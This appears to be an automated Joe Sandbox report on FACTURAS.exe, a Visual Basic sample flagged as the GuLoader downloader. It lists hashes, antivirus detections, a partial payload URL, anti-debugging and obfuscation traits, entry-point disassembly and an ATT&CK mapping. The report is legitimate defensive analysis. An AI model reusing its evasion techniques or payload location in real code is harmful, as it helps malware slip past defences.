Play interactive tour

Edit tour

Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:	FACTURAS.exe
Analysis ID:	539419
MD5:	2332fdde9344114749db5496eef5f5f9
SHA1:	303c40dd112294dc012836be48eb38e8af056432
SHA256:	0e693b9dcb4ccb3e64cb61396447dd4e3871234b4af80c2d57e4fbc9b6268a61
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Contains functionality to call native functions

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Detected potential crypto function

Classification

Process Tree

System is w10x64

FACTURAS.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: 2332FDDE9344114749DB5496EEF5F5F9)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downlD'"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlD'"}

Multi AV Scanner detection for submitted file

Show sources

Source: FACTURAS.exe	Virustotal: Detection: 40%	Perma Link
Source: FACTURAS.exe	Metadefender: Detection: 38%	Perma Link
Source: FACTURAS.exe	ReversingLabs: Detection: 57%

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downlD'

Source: FACTURAS.exe, 00000000.00000002.860970740.00000000005CA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: FACTURAS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306D940 NtAllocateVirtualMemory,	0_2_0306D940
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306DB0E NtAllocateVirtualMemory,	0_2_0306DB0E
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306DB52 NtAllocateVirtualMemory,	0_2_0306DB52
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306DE06 NtAllocateVirtualMemory,	0_2_0306DE06
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306DC8C NtAllocateVirtualMemory,	0_2_0306DC8C

Source: FACTURAS.exe, 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSERVICEKONTRAKTS.exe vs FACTURAS.exe
Source: FACTURAS.exe, 00000000.00000002.861579074.0000000002A60000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSERVICEKONTRAKTS.exeFE2XMURALL vs FACTURAS.exe
Source: FACTURAS.exe	Binary or memory string: OriginalFilenameSERVICEKONTRAKTS.exe vs FACTURAS.exe

Source: C:\Users\user\Desktop\FACTURAS.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03076B17	0_2_03076B17
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306D940	0_2_0306D940
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306E3A7	0_2_0306E3A7
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A3A0	0_2_0306A3A0
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306E3C2	0_2_0306E3C2
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A28E	0_2_0306A28E
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_030692AF	0_2_030692AF
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_030692DA	0_2_030692DA
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A122	0_2_0306A122
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306B1FE	0_2_0306B1FE
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306B034	0_2_0306B034
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A0B4	0_2_0306A0B4
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A0D5	0_2_0306A0D5
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A730	0_2_0306A730
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306E75A	0_2_0306E75A
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306C76B	0_2_0306C76B
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_030697F8	0_2_030697F8
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306E65C	0_2_0306E65C
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A6C9	0_2_0306A6C9
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306D566	0_2_0306D566
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306957A	0_2_0306957A
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03074430	0_2_03074430
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03069444	0_2_03069444
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A4C0	0_2_0306A4C0
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306E4F6	0_2_0306E4F6
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306DB0E	0_2_0306DB0E
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03074BBF	0_2_03074BBF
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03073BCC	0_2_03073BCC
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03069A80	0_2_03069A80
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03073ABC	0_2_03073ABC
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306AAFA	0_2_0306AAFA
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03069932	0_2_03069932
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306993C	0_2_0306993C
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03073994	0_2_03073994
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306A9DE	0_2_0306A9DE
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0307382F	0_2_0307382F
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03073860	0_2_03073860
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306E8B4	0_2_0306E8B4
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306EF04	0_2_0306EF04
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03074F2E	0_2_03074F2E
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03069FA8	0_2_03069FA8
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03069E60	0_2_03069E60
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306AE9A	0_2_0306AE9A
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306EEB4	0_2_0306EEB4
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03073D0C	0_2_03073D0C
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306CD2E	0_2_0306CD2E
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306AD74	0_2_0306AD74
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03069DDE	0_2_03069DDE
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306AC38	0_2_0306AC38
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03069CDB	0_2_03069CDB

Source: FACTURAS.exe	Virustotal: Detection: 40%
Source: FACTURAS.exe	Metadefender: Detection: 38%
Source: FACTURAS.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\FACTURAS.exe

File created: C:\Users\user\AppData\Local\Temp\~DF6CBEB2FF77188695.TMP

Jump to behavior

Source: FACTURAS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FACTURAS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: classification engine

Classification label: mal68.troj.winEXE@1/2@0/0

Source: C:\Users\user\Desktop\FACTURAS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

File created: C:\Users\user\AppData\Roaming\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_004098C0 push 2DBAC715h; retf	0_2_004098C5
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_004098CB push ss; retf	0_2_004098CD
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0040508B pushad ; ret	0_2_0040509D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0040755C push cs; retf	0_2_0040755D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00407179 push esp; iretd	0_2_00407181
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00407584 push cs; retf	0_2_0040755D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_004085B8 push edx; retf	0_2_004085B9
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_00406245 push ecx; retf	0_2_00406249
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_004072E6 push ebp; iretd	0_2_004072E9
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_004042FC push edx; retf	0_2_004042FD
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0040972A push eax; iretd	0_2_00409745
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_004083D6 pushfd ; iretd	0_2_00408422
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03066512 push ecx; retf	0_2_03066516
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03064E82 push esi; iretd	0_2_03064E99

Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe

Code function: 0_2_0306D11F rdtsc

0_2_0306D11F

Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0307339D mov eax, dword ptr fs:[00000030h]	0_2_0307339D
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_0306C76B mov eax, dword ptr fs:[00000030h]	0_2_0306C76B
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03072A70 mov eax, dword ptr fs:[00000030h]	0_2_03072A70
Source: C:\Users\user\Desktop\FACTURAS.exe	Code function: 0_2_03074F2E mov eax, dword ptr fs:[00000030h]	0_2_03074F2E

Source: C:\Users\user\Desktop\FACTURAS.exe

Code function: 0_2_0306D11F rdtsc

0_2_0306D11F

Source: C:\Users\user\Desktop\FACTURAS.exe

Code function: 0_2_03076B17 RtlAddVectoredExceptionHandler,

0_2_03076B17

Source: FACTURAS.exe, 00000000.00000002.861049488.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: FACTURAS.exe, 00000000.00000002.861049488.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: FACTURAS.exe, 00000000.00000002.861049488.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: FACTURAS.exe, 00000000.00000002.861049488.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	Input Capture1	Security Software Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	System Information Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FACTURAS.exe	41%	Virustotal		Browse
FACTURAS.exe	38%	Metadefender		Browse
FACTURAS.exe	58%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	539419
Start date:	14.12.2021
Start time:	09:38:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FACTURAS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winEXE@1/2@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 4.1% (good quality ratio 1.6%) Quality average: 18.8% Quality standard deviation: 26.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\M9XgMRXaN30mgEl56ja236 Download File
Process:	C:\Users\user\Desktop\FACTURAS.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:1ln:v
MD5:	34F45818F16D1BBB62BA5874B8814CC7
SHA1:	A454CA483B4A66B83826D061BE2859DD79FF0D6C
SHA-256:	DC765660B06EE03DD16FD7CA5B957E8C805161AC2C4AF28C5A100AB2AB432CA1
SHA-512:	65711C8D556639DDFC14CE292B2415F3A2824D003AF1A530093B8E0B70B695E6C639694B7B90C6750B1129566D9A3784ED274667988D4B227DB2AC9B6CF7548B
Malicious:	false
Reputation:	low
Preview:	....

C:\Users\user\AppData\Local\Temp\~DF6CBEB2FF77188695.TMP Download File
Process:	C:\Users\user\Desktop\FACTURAS.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.365570111635911
Encrypted:	false
SSDEEP:	48:rCXH5P26XpZKfAujEnkmHE+dJ+//iaBnF6UmkM:EHrZedAnjHrMyaL61
MD5:	E5AAF1474D5E7489F86A267B928DE425
SHA1:	8DAC741F82956D6111A5B442442E095DC4FC3299
SHA-256:	DBBEF5EC504CF458770890AF07448ABF835345029D078D4BA36CBF431F86314E
SHA-512:	B9AE66432026ADF7FE691F6E95292C6299CFE37FDC27760AD8DB5464386663A0398E53A770B0C8CCFDD734A8162064FF2D01093197A3BEC7356E9933EC344961
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.04128986675064
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FACTURAS.exe
File size:	147456
MD5:	2332fdde9344114749db5496eef5f5f9
SHA1:	303c40dd112294dc012836be48eb38e8af056432
SHA256:	0e693b9dcb4ccb3e64cb61396447dd4e3871234b4af80c2d57e4fbc9b6268a61
SHA512:	7b3d94fb5e12a09f1b417e8042cbb0abe394a1d577a466cd2394e9aa0068ab276d5da25edf742660edb8bd01611f4680c982d6f14373d80e2896d34a887379c1
SSDEEP:	1536:nVas/8YOk4FOHBbmpBpQr9nV43XExeM0Jw52P3u1D6CqljbW:Is/8YJ4kRmpBpqVC090JS63hN
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....e`V.....................0............... ....@................

File Icon


Icon Hash:	0cceececceece400

Static PE Info

General
Entrypoint:	0x401698
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x566065B6 [Thu Dec 3 15:54:30 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	98b6dd560a57b8960045d82e7d77c431

Entrypoint Preview

Instruction
push 004020ACh
call 00007FDF60D3E2C3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
js 00007FDF60D3E2C8h
rcl byte ptr [ecx-65h], cl
fsubr dword ptr [edx]
dec eax
cmpsd
mov ebp, 0FAA5268h
pop eax
stc
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
popfd
aam 00h
das
mov al, byte ptr [69676445h]
jc 00007FDF60D3E304h
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add byte ptr [ebx], dl
pop esi
push es
sal byte ptr [ebx-76h], cl
inc ebp
lodsb
pop esp
pop esi
jmp 00007FDF60D3E2A4h
pop ebp
mov bh, 60h
xor eax, 0FA504B7h
mov ebp, eax
inc ebx
xchg eax, edi
xor edi, dword ptr [DAF603FAh]
outsd
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc cl, byte ptr [ecx]
add byte ptr [eax], al
or eax, 00000009h
push es
add byte ptr [ecx+65h], bl
jc 00007FDF60D3E33Dh
jnc 00007FDF60D3E303h
add byte ptr [67000801h], cl
jc 00007FDF60D3E333h
insb
imul ebp, dword ptr [esi+65h], 00011900h
inc edx
add byte ptr [ebx], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20fb4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0xc6c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x208	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20638	0x21000	False	0.363976680871	data	5.21775436592	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x1238	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0xc6c	0x1000	False	0.484130859375	data	4.2105621782	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x243c4	0x8a8	data
RT_GROUP_ICON	0x243b0	0x14	data
RT_VERSION	0x240f0	0x2c0	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, __vbaPut3, _adj_fdiv_m64, __vbaFpCDblR8, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	MURAL
InternalName	SERVICEKONTRAKTS
FileVersion	1.00
CompanyName	MURAL
LegalTrademarks	MURAL
ProductName	MURAL
ProductVersion	1.00
FileDescription	MURAL
OriginalFilename	SERVICEKONTRAKTS.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: FACTURAS.exe PID: 6492 Parent PID: 5852

General

Start time:	09:39:39
Start date:	14/12/2021
Path:	C:\Users\user\Desktop\FACTURAS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	2332FDDE9344114749DB5496EEF5F5F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: FACTURAS.exe PID: 6492 Parent PID: 5852 FACTURAS.exeCOMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	24.4%
Signature Coverage:	6.8%
Total number of Nodes:	336
Total number of Limit Nodes:	36

Executed Functions

Function 0306D940, Relevance: 13.1, APIs: 1, Strings: 6, Instructions: 894
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(12952C1F,?,-0000000126A79646), ref: 0306DED1

Strings

2+g, xrefs: 0306A110
-3n, xrefs: 0306B206
IJ, xrefs: 0306DF30
@ , xrefs: 0306A252
?k, xrefs: 0306A491
$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: $$-3n$2+g$?k$@ $IJ
API String ID: 2167126740-2720747377
Opcode ID: 0ab64d75af5be68d592bc8132fe449adb1ffa9d44a9ca6bbb367a40ab5360c10
Instruction ID: 74e2ca6278afb7a32cb5bf2a9f70c26f0a5583bb54dcecc48e29b6ecf936f24a
Opcode Fuzzy Hash: 0ab64d75af5be68d592bc8132fe449adb1ffa9d44a9ca6bbb367a40ab5360c10
Instruction Fuzzy Hash: C882FD71A08349DFDB64CF39C8887DAB7B2FF55300F45812EE8899B614CB758AA4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03076B17, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`%I, xrefs: 030774F8

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: `%I
API String ID: 0-2925711119
Opcode ID: ed274972b255b977749a56d961ba3634663b5976f775048d906cac651669a68d
Instruction ID: 27792d1eba5f872cbd361f8b817a3d27a02f2f0e10dc7b03e5f464d8d16f8ace
